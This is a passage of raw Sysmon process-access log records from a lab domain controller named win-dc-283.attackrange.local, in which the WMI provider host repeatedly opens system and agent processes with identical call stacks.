Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 